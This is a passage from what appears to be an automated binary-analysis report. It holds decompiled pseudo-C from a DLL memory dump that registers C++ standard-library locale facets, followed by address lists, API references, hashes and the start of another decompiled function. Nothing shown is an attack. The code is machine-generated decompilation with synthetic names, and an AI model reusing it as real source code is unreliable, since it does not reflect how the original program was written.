																																																										_t797 =  *((intOrPtr*)(_t946 + 8));
																																																										_t899 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t541);
																																																										__eflags = _t899;
																																																										if(_t899 != 0) {
																																																											L131:
																																																											E6D4866BA(_t946 - 0x14);
																																																											return E6D4A0075(_t899);
																																																										} else {
																																																											__eflags = _t921;
																																																											if(_t921 == 0) {
																																																												_push( *((intOrPtr*)(_t946 + 8)));
																																																												_push(_t946 - 0x10);
																																																												__eflags = E6D491558(_t668, _t797, _t879, _t899, _t921) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6D461438(_t946 - 0x20);
																																																													E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																													asm("int3");
																																																													E6D4A00AC(0x6d4e83cf, _t668, _t899, _t921, 0x14);
																																																													E6D486653(_t946 - 0x14, 0);
																																																													_t922 =  *0x6d546e00; // 0x0
																																																													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																													 *(_t946 - 0x10) = _t922;
																																																													_t554 = E6D46161C(0x6d546dac);
																																																													_t804 =  *((intOrPtr*)(_t946 + 8));
																																																													_t900 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t554);
																																																													__eflags = _t900;
																																																													if(_t900 != 0) {
																																																														L138:
																																																														E6D4866BA(_t946 - 0x14);
																																																														return E6D4A0075(_t900);
																																																													} else {
																																																														__eflags = _t922;
																																																														if(_t922 == 0) {
																																																															_push( *((intOrPtr*)(_t946 + 8)));
																																																															_push(_t946 - 0x10);
																																																															__eflags = E6D4915C4(_t668, _t804, _t879, _t900, _t922) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6D461438(_t946 - 0x20);
																																																																E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																																asm("int3");
																																																																E6D4A00AC(0x6d4e83cf, _t668, _t900, _t922, 0x14);
																																																																E6D486653(_t946 - 0x14, 0);
																																																																_t923 =  *0x6d546dd0; // 0x0
																																																																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																																 *(_t946 - 0x10) = _t923;
																																																																_t567 = E6D46161C(0x6d546d60);
																																																																_t811 =  *((intOrPtr*)(_t946 + 8));
																																																																_t901 = E6D46171B( *((intOrPtr*)(_t946 + 8)), _t567);
																																																																__eflags = _t901;
																																																																if(_t901 != 0) {
																																																																	L145:
																																																																	E6D4866BA(_t946 - 0x14);
																																																																	return E6D4A0075(_t901);
																																																																} else {
																																																																	__eflags = _t923;
																																																																	if(_t923 == 0) {
																																																																		_push( *((intOrPtr*)(_t946 + 8)));
																																																																		_push(_t946 - 0x10);
																																																																		__eflags = E6D49162A(_t668, _t811, _t879, _t901, _t923) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			_t815 = _t946 - 0x20;
																																																																			E6D461438(_t815);
																																																																			E6D4A3D74(_t946 - 0x20, 0x6d543504);
																																																																			asm("int3");
																																																																			E6D4A00AC(0x6d4e851f, _t668, _t901, _t923, 4);
																																																																			_t924 = _t815;
																																																																			 *(_t946 - 0x10) = _t924;
																																																																			 *((intOrPtr*)(_t924 + 4)) =  *((intOrPtr*)(_t946 + 0xc));
																																																																			_push( *((intOrPtr*)(_t946 + 0x14)));
																																																																			_t301 = _t946 - 4;
																																																																			 *_t301 =  *(_t946 - 4) & 0x00000000;
																																																																			__eflags =  *_t301;
																																																																			 *_t924 = 0x6d4ec0c4;
																																																																			 *((char*)(_t924 + 0x28)) =  *((intOrPtr*)(_t946 + 0x10));
																																																																			E6D49542F(_t668, _t815, _t879, _t901, _t924,  *_t301);
																																																																			return E6D4A0075(_t924,  *((intOrPtr*)(_t946 + 8)));
																																																																		} else {
																																																																			_t901 =  *(_t946 - 0x10);
																																																																			 *(_t946 - 0x10) = _t901;
																																																																			 *(_t946 - 4) = 1;
																																																																			E6D486FD3(__eflags, _t901);
																																																																			 *0x6d4ea26c();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t901 + 4))))();
																																																																			 *0x6d546dd0 = _t901;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t901 = _t923;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t900 =  *(_t946 - 0x10);
																																																																 *(_t946 - 0x10) = _t900;
																																																																 *(_t946 - 4) = 1;
																																																																E6D486FD3(__eflags, _t900);
																																																																 *0x6d4ea26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t900 + 4))))();
																																																																 *0x6d546e00 = _t900;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t900 = _t922;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t899 =  *(_t946 - 0x10);
																																																													 *(_t946 - 0x10) = _t899;
																																																													 *(_t946 - 4) = 1;
																																																													E6D486FD3(__eflags, _t899);
																																																													 *0x6d4ea26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t899 + 4))))();
																																																													 *0x6d546dcc = _t899;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t899 = _t921;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t898 =  *(_t946 - 0x10);
																																																										 *(_t946 - 0x10) = _t898;
																																																										 *(_t946 - 4) = 1;
																																																										E6D486FD3(__eflags, _t898);
																																																										 *0x6d4ea26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t898 + 4))))();
																																																										 *0x6d546dfc = _t898;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t898 = _t920;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t897 =  *(_t946 - 0x10);
																																																							 *(_t946 - 0x10) = _t897;
																																																							 *(_t946 - 4) = 1;
																																																							E6D486FD3(__eflags, _t897);
																																																							 *0x6d4ea26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t897 + 4))))();
																																																							 *0x6d546de0 = _t897;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t897 = _t919;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t896 =  *(_t946 - 0x10);
																																																				 *(_t946 - 0x10) = _t896;
																																																				 *(_t946 - 4) = 1;
																																																				E6D486FD3(__eflags, _t896);
																																																				 *0x6d4ea26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t896 + 4))))();
																																																				 *0x6d546ddc = _t896;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t896 = _t918;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t895 =  *(_t946 - 0x10);
																																																	 *(_t946 - 0x10) = _t895;
																																																	 *(_t946 - 4) = 1;
																																																	E6D486FD3(__eflags, _t895);
																																																	 *0x6d4ea26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t895 + 4))))();
																																																	 *0x6d546db0 = _t895;
																																																	goto L103;
																																																}
																																															} else {
																																																_t895 = _t917;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t894 =  *(_t946 - 0x10);
																																														 *(_t946 - 0x10) = _t894;
																																														 *(_t946 - 4) = 1;
																																														E6D486FD3(__eflags, _t894);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t894 + 4))))();
																																														 *0x6d546dd8 = _t894;
																																														goto L96;
																																													}
																																												} else {
																																													_t894 = _t916;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t893 =  *(_t946 - 0x10);
																																											 *(_t946 - 0x10) = _t893;
																																											 *(_t946 - 4) = 1;
																																											E6D486FD3(__eflags, _t893);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t893 + 4))))();
																																											 *0x6d546dc4 = _t893;
																																											goto L89;
																																										}
																																									} else {
																																										_t893 = _t915;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t892 =  *(_t946 - 0x10);
																																								 *(_t946 - 0x10) = _t892;
																																								 *(_t946 - 4) = 1;
																																								E6D486FD3(__eflags, _t892);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t892 + 4))))();
																																								 *0x6d546dc8 = _t892;
																																								goto L82;
																																							}
																																						} else {
																																							_t892 = _t914;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t891 =  *(_t946 - 0x10);
																																					 *(_t946 - 0x10) = _t891;
																																					 *(_t946 - 4) = 1;
																																					E6D486FD3(__eflags, _t891);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t891 + 4))))();
																																					 *0x6d546df4 = _t891;
																																					goto L75;
																																				}
																																			} else {
																																				_t891 = _t913;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t890 =  *(_t946 - 0x10);
																																		 *(_t946 - 0x10) = _t890;
																																		 *(_t946 - 4) = 1;
																																		E6D486FD3(__eflags, _t890);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t890 + 4))))();
																																		 *0x6d546df8 = _t890;
																																		goto L68;
																																	}
																																} else {
																																	_t890 = _t912;
																																	goto L68;
																																}
																															}
																														} else {
																															_t889 =  *(_t946 - 0x10);
																															 *(_t946 - 0x10) = _t889;
																															 *(_t946 - 4) = 1;
																															E6D486FD3(__eflags, _t889);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t889 + 4))))();
																															 *0x6d546dc0 = _t889;
																															goto L61;
																														}
																													} else {
																														_t889 = _t911;
																														goto L61;
																													}
																												}
																											} else {
																												_t888 =  *(_t946 - 0x10);
																												 *(_t946 - 0x10) = _t888;
																												 *(_t946 - 4) = 1;
																												E6D486FD3(__eflags, _t888);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t888 + 4))))();
																												 *0x6d546df0 = _t888;
																												goto L54;
																											}
																										} else {
																											_t888 = _t910;
																											goto L54;
																										}
																									}
																								} else {
																									_t887 =  *(_t946 - 0x10);
																									 *(_t946 - 0x10) = _t887;
																									 *(_t946 - 4) = 1;
																									E6D486FD3(__eflags, _t887);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t887 + 4))))();
																									 *0x6d546dbc = _t887;
																									goto L47;
																								}
																							} else {
																								_t887 = _t909;
																								goto L47;
																							}
																						}
																					} else {
																						_t886 =  *(_t946 - 0x10);
																						 *(_t946 - 0x10) = _t886;
																						 *(_t946 - 4) = 1;
																						E6D486FD3(__eflags, _t886);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t886 + 4))))();
																						 *0x6d546dec = _t886;
																						goto L40;
																					}
																				} else {
																					_t886 = _t908;
																					goto L40;
																				}
																			}
																		} else {
																			_t885 =  *(_t946 - 0x10);
																			 *(_t946 - 0x10) = _t885;
																			 *(_t946 - 4) = 1;
																			E6D486FD3(__eflags, _t885);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t885 + 4))))();
																			 *0x6d546db8 = _t885;
																			goto L33;
																		}
																	} else {
																		_t885 = _t907;
																		goto L33;
																	}
																}
															} else {
																_t884 =  *(_t946 - 0x10);
																 *(_t946 - 0x10) = _t884;
																 *(_t946 - 4) = 1;
																E6D486FD3(__eflags, _t884);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t884 + 4))))();
																 *0x6d546de8 = _t884;
																goto L26;
															}
														} else {
															_t884 = _t906;
															goto L26;
														}
													}
												} else {
													_t883 =  *(_t946 - 0x10);
													 *(_t946 - 0x10) = _t883;
													 *(_t946 - 4) = 1;
													E6D486FD3(__eflags, _t883);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t883 + 4))))();
													 *0x6d546dd4 = _t883;
													goto L19;
												}
											} else {
												_t883 = _t905;
												goto L19;
											}
										}
									} else {
										_t882 =  *(_t946 - 0x10);
										 *(_t946 - 0x10) = _t882;
										 *(_t946 - 4) = 1;
										E6D486FD3(__eflags, _t882);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t882 + 4))))();
										 *0x6d546db4 = _t882;
										goto L12;
									}
								} else {
									_t882 = _t904;
									goto L12;
								}
							}
						} else {
							_t881 =  *(_t946 - 0x10);
							 *(_t946 - 0x10) = _t881;
							 *(_t946 - 4) = 1;
							E6D486FD3(__eflags, _t881);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t881 + 4))))();
							 *0x6d546de4 = _t881;
							goto L5;
						}
					} else {
						_t881 = _t903;
						goto L5;
					}
				}
			}

0x6d48ef91
0x6d48ef91
0x6d48ef98
0x6d48efa2
0x6d48efa7
0x6d48efb2
0x6d48efb6
0x6d48efb9
0x6d48efbe
0x6d48efc2
0x6d48efc7
0x6d48efcb
0x6d48f010
0x6d48f013
0x6d48f01f
0x6d48efcd
0x6d48efcf
0x6d48efd5
0x6d48efdb
0x6d48efe3
0x6d48efe6
0x6d48f023
0x6d48f031
0x6d48f036
0x6d48f03e
0x6d48f048
0x6d48f04d
0x6d48f058
0x6d48f05c
0x6d48f05f
0x6d48f064
0x6d48f06d
0x6d48f06f
0x6d48f071
0x6d48f0b6
0x6d48f0b9
0x6d48f0c5
0x6d48f073
0x6d48f073
0x6d48f075
0x6d48f07b
0x6d48f081
0x6d48f089
0x6d48f08c
0x6d48f0c9
0x6d48f0d7
0x6d48f0dc
0x6d48f0e4
0x6d48f0ee
0x6d48f0f3
0x6d48f0fe
0x6d48f102
0x6d48f105
0x6d48f10a
0x6d48f113
0x6d48f115
0x6d48f117
0x6d48f15c
0x6d48f15f
0x6d48f16b
0x6d48f119
0x6d48f119
0x6d48f11b
0x6d48f121
0x6d48f127
0x6d48f12f
0x6d48f132
0x6d48f16f
0x6d48f17d
0x6d48f182
0x6d48f18a
0x6d48f194
0x6d48f199
0x6d48f1a4
0x6d48f1a8
0x6d48f1ab
0x6d48f1b0
0x6d48f1b9
0x6d48f1bb
0x6d48f1bd
0x6d48f202
0x6d48f205
0x6d48f211
0x6d48f1bf
0x6d48f1bf
0x6d48f1c1
0x6d48f1c7
0x6d48f1cd
0x6d48f1d5
0x6d48f1d8
0x6d48f215
0x6d48f223
0x6d48f228
0x6d48f230
0x6d48f23a
0x6d48f23f
0x6d48f24a
0x6d48f24e
0x6d48f251
0x6d48f256
0x6d48f25f
0x6d48f261
0x6d48f263
0x6d48f2a8
0x6d48f2ab
0x6d48f2b7
0x6d48f265
0x6d48f265
0x6d48f267
0x6d48f26d
0x6d48f273
0x6d48f27b
0x6d48f27e
0x6d48f2bb
0x6d48f2c9
0x6d48f2ce
0x6d48f2d6
0x6d48f2e0
0x6d48f2e5
0x6d48f2f0
0x6d48f2f4
0x6d48f2f7
0x6d48f2fc
0x6d48f305
0x6d48f307
0x6d48f309
0x6d48f34e
0x6d48f351
0x6d48f35d
0x6d48f30b
0x6d48f30b
0x6d48f30d
0x6d48f313
0x6d48f319
0x6d48f321
0x6d48f324
0x6d48f361
0x6d48f36f
0x6d48f374
0x6d48f37c
0x6d48f386
0x6d48f38b
0x6d48f396
0x6d48f39a
0x6d48f39d
0x6d48f3a2
0x6d48f3ab
0x6d48f3ad
0x6d48f3af
0x6d48f3f4
0x6d48f3f7
0x6d48f403
0x6d48f3b1
0x6d48f3b1
0x6d48f3b3
0x6d48f3b9
0x6d48f3bf
0x6d48f3c7
0x6d48f3ca
0x6d48f407
0x6d48f415
0x6d48f41a
0x6d48f422
0x6d48f42c
0x6d48f431
0x6d48f43c
0x6d48f440
0x6d48f443
0x6d48f448
0x6d48f451
0x6d48f453
0x6d48f455
0x6d48f49a
0x6d48f49d
0x6d48f4a9
0x6d48f457
0x6d48f457
0x6d48f459
0x6d48f45f
0x6d48f465
0x6d48f46d
0x6d48f470
0x6d48f4ad
0x6d48f4bb
0x6d48f4c0
0x6d48f4c8
0x6d48f4d2
0x6d48f4d7
0x6d48f4e2
0x6d48f4e6
0x6d48f4e9
0x6d48f4ee
0x6d48f4f7
0x6d48f4f9
0x6d48f4fb
0x6d48f540
0x6d48f543
0x6d48f54f
0x6d48f4fd
0x6d48f4fd
0x6d48f4ff
0x6d48f505
0x6d48f50b
0x6d48f513
0x6d48f516
0x6d48f553
0x6d48f561
0x6d48f566
0x6d48f56e
0x6d48f578
0x6d48f57d
0x6d48f588
0x6d48f58c
0x6d48f58f
0x6d48f594
0x6d48f59d
0x6d48f59f
0x6d48f5a1
0x6d48f5e6
0x6d48f5e9
0x6d48f5f5
0x6d48f5a3
0x6d48f5a3
0x6d48f5a5
0x6d48f5ab
0x6d48f5b1
0x6d48f5b9
0x6d48f5bc
0x6d48f5f9
0x6d48f607
0x6d48f60c
0x6d48f614
0x6d48f61e
0x6d48f623
0x6d48f62e
0x6d48f632
0x6d48f635
0x6d48f63a
0x6d48f643
0x6d48f645
0x6d48f647
0x6d48f68c
0x6d48f68f
0x6d48f69b
0x6d48f649
0x6d48f649
0x6d48f64b
0x6d48f651
0x6d48f657
0x6d48f65f
0x6d48f662
0x6d48f69f
0x6d48f6ad
0x6d48f6b2
0x6d48f6ba
0x6d48f6c4
0x6d48f6c9
0x6d48f6d4
0x6d48f6d8
0x6d48f6db
0x6d48f6e0
0x6d48f6e9
0x6d48f6eb
0x6d48f6ed
0x6d48f732
0x6d48f735
0x6d48f741
0x6d48f6ef
0x6d48f6ef
0x6d48f6f1
0x6d48f6f7
0x6d48f6fd
0x6d48f705
0x6d48f708
0x6d48f745
0x6d48f753
0x6d48f758
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78f
0x6d48f791
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797
0x6d48f70a
0x6d48f70a
0x6d48f70d
0x6d48f711
0x6d48f715
0x6d48f722
0x6d48f72a
0x6d48f72c
0x00000000
0x6d48f72c
0x6d48f6f3
0x6d48f6f3
0x00000000
0x6d48f6f3
0x6d48f6f1
0x6d48f664
0x6d48f664
0x6d48f667
0x6d48f66b
0x6d48f66f
0x6d48f67c
0x6d48f684
0x6d48f686
0x00000000
0x6d48f686
0x6d48f64d
0x6d48f64d
0x00000000
0x6d48f64d
0x6d48f64b
0x6d48f5be
0x6d48f5be
0x6d48f5c1
0x6d48f5c5
0x6d48f5c9
0x6d48f5d6
0x6d48f5de
0x6d48f5e0
0x00000000
0x6d48f5e0
0x6d48f5a7
0x6d48f5a7
0x00000000
0x6d48f5a7
0x6d48f5a5
0x6d48f518
0x6d48f518
0x6d48f51b
0x6d48f51f
0x6d48f523
0x6d48f530
0x6d48f538
0x6d48f53a
0x00000000
0x6d48f53a
0x6d48f501
0x6d48f501
0x00000000
0x6d48f501
0x6d48f4ff
0x6d48f472
0x6d48f472
0x6d48f475
0x6d48f479
0x6d48f47d
0x6d48f48a
0x6d48f492
0x6d48f494
0x00000000
0x6d48f494
0x6d48f45b
0x6d48f45b
0x00000000
0x6d48f45b
0x6d48f459
0x6d48f3cc
0x6d48f3cc
0x6d48f3cf
0x6d48f3d3
0x6d48f3d7
0x6d48f3e4
0x6d48f3ec
0x6d48f3ee
0x00000000
0x6d48f3ee
0x6d48f3b5
0x6d48f3b5
0x00000000
0x6d48f3b5
0x6d48f3b3
0x6d48f326
0x6d48f326
0x6d48f329
0x6d48f32d
0x6d48f331
0x6d48f33e
0x6d48f346
0x6d48f348
0x00000000
0x6d48f348
0x6d48f30f
0x6d48f30f
0x00000000
0x6d48f30f
0x6d48f30d
0x6d48f280
0x6d48f280
0x6d48f283
0x6d48f287
0x6d48f28b
0x6d48f298
0x6d48f2a0
0x6d48f2a2
0x00000000
0x6d48f2a2
0x6d48f269
0x6d48f269
0x00000000
0x6d48f269
0x6d48f267
0x6d48f1da
0x6d48f1da
0x6d48f1dd
0x6d48f1e1
0x6d48f1e5
0x6d48f1f2
0x6d48f1fa
0x6d48f1fc
0x00000000
0x6d48f1fc
0x6d48f1c3
0x6d48f1c3
0x00000000
0x6d48f1c3
0x6d48f1c1
0x6d48f134
0x6d48f134
0x6d48f137
0x6d48f13b
0x6d48f13f
0x6d48f14c
0x6d48f154
0x6d48f156
0x00000000
0x6d48f156
0x6d48f11d
0x6d48f11d
0x00000000
0x6d48f11d
0x6d48f11b
0x6d48f08e
0x6d48f08e
0x6d48f091
0x6d48f095
0x6d48f099
0x6d48f0a6
0x6d48f0ae
0x6d48f0b0
0x00000000
0x6d48f0b0
0x6d48f077
0x6d48f077
0x00000000
0x6d48f077
0x6d48f075
0x6d48efe8
0x6d48efe8
0x6d48efeb
0x6d48efef
0x6d48eff3
0x6d48f000
0x6d48f008
0x6d48f00a
0x00000000
0x6d48f00a
0x6d48efd1
0x6d48efd1
0x00000000
0x6d48efd1
0x6d48efcf

APIs

__EH_prolog3.LIBCMT ref: 6D48EF98
std::_Lockit::_Lockit.LIBCPMT ref: 6D48EFA2
int.LIBCPMT ref: 6D48EFB9

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

collate.LIBCPMT ref: 6D48EFDC
std::_Facet_Register.LIBCPMT ref: 6D48EFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F013
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F031

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 5238d6706fac9896d247a962540e0513fb4f08c89e7baf620fcced5b482ae0b1
Instruction ID: 962aaaca851c3c92ee19a1521c6c4b9e8e38070c3b2c670cc84ad9c8db6a5dd7
Opcode Fuzzy Hash: 5238d6706fac9896d247a962540e0513fb4f08c89e7baf620fcced5b482ae0b1
Instruction Fuzzy Hash: D011E0758082599BCF05EBA0C840FEDB774AF94314F2A440DE611BB392DB70EE0087E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D49B9E4, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D49B9E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t198 - 0x14, 0);
				_t189 =  *0x6d546e3c; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6D46161C(0x6d546e1c);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6D46171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6D4866BA(_t198 - 0x14);
					return E6D4A0075(_t184);
				} else {
					if(_t189 == 0) {
